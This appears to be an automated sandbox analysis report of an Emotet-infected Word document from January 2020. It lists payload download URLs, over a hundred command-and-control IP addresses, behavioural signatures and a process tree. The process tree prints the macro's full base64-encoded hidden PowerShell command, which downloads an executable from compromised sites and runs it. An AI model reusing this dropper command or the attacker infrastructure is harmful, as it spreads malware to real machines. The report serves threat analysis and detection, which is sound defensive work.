Analysis
-
max time kernel
28s -
resource
win10v191014 -
submitted
22-01-2020 07:01
General
Malware Config
Extracted
http://trangvang.info.vn/home/poIc7l/
https://www.flybuys.net/libraries/xes/
http://informatic-club.com/language/y/
http://demo.stickypost.io/wp-admin/g/
https://www.drivertrainerschool.com.au/logs/RYJPgrKOJ/
Extracted
emotet
68.114.229.171:80
74.101.225.121:443
152.168.248.128:443
217.160.19.232:8080
176.9.43.37:8080
5.199.130.105:7080
37.187.72.193:8080
68.172.243.146:80
181.143.126.170:80
108.191.2.72:80
85.152.174.56:80
101.187.197.33:443
121.88.5.176:443
189.203.177.41:443
78.186.5.109:443
66.34.201.20:7080
209.141.54.221:8080
181.126.70.117:80
87.106.136.232:8080
181.13.24.82:80
58.171.42.66:8080
47.156.70.145:80
201.184.105.242:443
188.0.135.237:80
190.12.119.180:443
115.95.6.218:443
46.105.131.69:443
190.55.181.54:443
139.130.241.252:443
41.60.200.34:80
201.173.217.124:443
95.128.43.213:8080
78.142.114.69:80
37.157.194.134:443
200.71.200.4:443
160.16.215.66:8080
139.130.242.43:80
206.189.112.148:8080
70.169.53.234:80
61.37.31.243:80
91.73.197.90:80
167.71.10.37:8080
108.179.206.219:8080
88.249.120.205:80
50.116.86.205:8080
72.189.57.105:80
47.180.91.213:80
85.105.205.77:8080
190.143.39.231:80
223.197.185.60:80
91.205.215.66:443
120.150.246.241:80
104.131.44.150:8080
211.63.71.72:8080
149.202.153.252:8080
105.27.155.182:80
95.213.236.64:8080
104.131.11.150:8080
210.6.85.121:80
24.164.79.147:8080
92.222.216.44:8080
202.175.121.202:8090
221.165.123.72:80
118.185.7.132:80
74.130.83.133:80
110.36.217.66:8080
179.13.185.19:80
209.97.168.52:8080
62.138.26.28:8080
47.6.15.79:443
169.239.182.217:8080
5.196.74.210:8080
173.21.26.90:80
62.75.187.192:8080
183.102.238.69:465
178.153.176.124:80
105.247.123.133:8080
31.172.240.91:8080
103.86.49.11:8080
60.250.78.22:443
100.6.23.40:80
186.86.247.171:443
200.116.145.225:443
177.239.160.121:80
98.156.206.153:80
47.6.15.79:80
64.40.250.5:80
73.11.153.178:8080
101.187.237.217:80
190.117.126.169:80
98.30.113.161:80
45.33.49.124:443
76.104.80.47:80
103.97.95.218:80
72.186.137.156:80
64.66.6.71:8080
182.176.132.213:8090
24.94.237.248:80
24.196.49.98:80
78.189.180.107:80
87.81.51.125:80
190.220.19.82:443
70.175.171.251:80
159.65.25.128:8080
62.75.141.82:80
217.160.182.191:8080
190.146.205.227:8080
189.159.112.237:8080
90.69.145.210:8080
200.21.90.5:443
76.104.80.47:443
87.106.139.101:8080
37.139.21.175:8080
205.185.117.108:8080
115.65.111.148:443
60.231.217.199:8080
211.192.153.224:80
201.229.45.222:8080
190.114.244.182:443
87.230.19.21:8080
47.153.183.211:80
190.117.226.104:80
178.237.139.83:8080
85.67.10.190:80
180.92.239.110:8080
2.237.76.249:80
24.105.202.216:443
Signatures
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
Powershell.exepid process 4036 Powershell.exe -
Suspicious use of WriteProcessMemory 2 IoCs
Processes:
Powershell.exe139.exedescription pid process target process PID 4036 wrote to memory of 4524 4036 Powershell.exe 139.exe PID 4524 wrote to memory of 4672 4524 139.exe 139.exe -
Executes dropped EXE 2 IoCs
Processes:
139.exe139.exepid process 4524 139.exe 4672 139.exe -
Suspicious behavior: EmotetMutantsSpam 1 IoCs
Processes:
139.exepid process 4672 139.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 4868 WINWORD.EXE -
Process spawned unexpected child process 1 IoCs
Processes:
Powershell.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4036 4988 Powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
Powershell.exedescription pid process Token: SeDebugPrivilege 4036 Powershell.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
WINWORD.EXEpid process 4868 WINWORD.EXE
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\4193cc28bba587d73c8c3e901813a79cfa6fff7a43170f4cd99a6ce7560b1719.doc" /o ""1⤵
- Suspicious behavior: AddClipboardFormatListener
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
PID:4868
-
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exePowershell -w hidden -en JABNAGEAdABlAGQAdgB0AG4AZAA9ACcASABpAGoAcgBsAGsAbABjAG4AYgAnADsAJABYAGcAbQB4AGkAagBsAHEAaQBjAGsAbABpACAAPQAgACcAMQAzADkAJwA7ACQATABhAHkAcABvAHQAdwBrAG4APQAnAFMAcwBrAGYAYwBkAHMAaQBrAHcAYwBjACcAOwAkAFkAcQBlAGkAcwBoAHIAZgB0AG0AcAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAWABnAG0AeABpAGoAbABxAGkAYwBrAGwAaQArACcALgBlAHgAZQAnADsAJABSAGEAegBnAGcAZQBpAHAAcABzAGMAPQAnAFkAawBxAGIAdAB4AHAAegAnADsAJABTAG4AeQBsAGUAdAB6AGsAZgBqAGYAbgA9ACYAKAAnAG4AZQAnACsAJwB3AC0AbwAnACsAJwBiACcAKwAnAGoAZQBjAHQAJwApACAAbgBlAFQALgB3AEUAQgBDAEwAaQBFAG4AVAA7ACQARwBhAHAAawBzAGUAaQB2AGUAbwA9ACcAaAB0AHQAcAA6AC8ALwB0AHIAYQBuAGcAdgBhAG4AZwAuAGkAbgBmAG8ALgB2AG4ALwBoAG8AbQBlAC8AcABvAEkAYwA3AGwALwAqAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAGYAbAB5AGIAdQB5AHMALgBuAGUAdAAvAGwAaQBiAHIAYQByAGkAZQBzAC8AeABlAHMALwAqAGgAdAB0AHAAOgAvAC8AaQBuAGYAbwByAG0AYQB0AGkAYwAtAGMAbAB1AGIALgBjAG8AbQAvAGwAYQBuAGcAdQBhAGcAZQAvAHkALwAqAGgAdAB0AHAAOgAvAC8AZABlAG0AbwAuAHMAdABpAGMAawB5AHAAbwBzAHQALgBpAG8ALwB3AHAALQBhAGQAbQBpAG4ALwBnAC8AKgBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBkAHIAaQB2AGUAcgB0AHIAYQBpAG4AZQByAHMAYwBoAG8AbwBsAC4AYwBvAG0ALgBhAHUALwBsAG8AZwBzAC8AUgBZAEoAUABnAHIASwBPAEoALwAnAC4AIgBzAGAAcABsAEkAVAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAEcAegBqAGkAdQBhAGgAagB5AHIAeQB4AHQAPQAnAEgAZwBrAGMAZABzAGQAZgAnADsAZgBvAHIAZQBhAGMAaAAoACQASwB4AHoAdABhAGwAaABwAGkAbgB2ACAAaQBuACAAJABHAGEAcABrAHMAZQBpAHYAZQBvACkAewB0AHIAeQB7ACQAUwBuAHkAbABlAHQAegBrAGYAagBmAG4ALgAiAGQAYABvAHcATgBMAGAATwBhAEQARgBgAGkAbABFACIAKAAkAEsAeAB6AHQAYQBsAGgAcABpAG4AdgAsACAAJABZAHEAZQBpAHMAaAByAGYAdABtAHAAKQA7ACQAWQB0AHYAagBlAHIAcwB5AGEAdABoAHcAPQAnAE8AaABqAGQAZwBmAGIAcgB0AHgAbAAnADsASQBmACAAKAAoAC4AKAAnAEcAZQB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAFkAcQBlAGkAcwBoAHIAZgB0AG0AcAApAC4AIgBsAGAAZQBuAGcAdABIACIAIAAtAGcAZQAgADMAMgA2ADgAMQApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBzAGAAVABhAFIAVAAiACgAJABZAHEAZQBpAHMAaAByAGYAdABtAHAAKQA7ACQATwBoAGQAdQBqAHAAdwBoAG0AegB0AGEAZwA9ACcARAB3AGwAawB3AG4AdwBqAHoAeQB1AHMAJwA7AGIAcgBlAGEAawA7ACQAWAB4AG8AbAB2AGsAdABxAD0AJwBIAHEAaAB1AGoAagBnAHoAZAB6ACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEEAZgBpAGkAcwB4AGQAdgA9ACcAUQBnAHAAYwBmAG8AbABvAHkAbgBrAHoAZAAnAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
- Process spawned unexpected child process
- Suspicious use of AdjustPrivilegeToken
PID:4036 -
C:\Users\Admin\139.exe"C:\Users\Admin\139.exe"2⤵
- Suspicious use of WriteProcessMemory
- Executes dropped EXE
PID:4524 -
C:\Users\Admin\139.exe--9465b8d53⤵
- Executes dropped EXE
- Suspicious behavior: EmotetMutantsSpam
PID:4672
-
-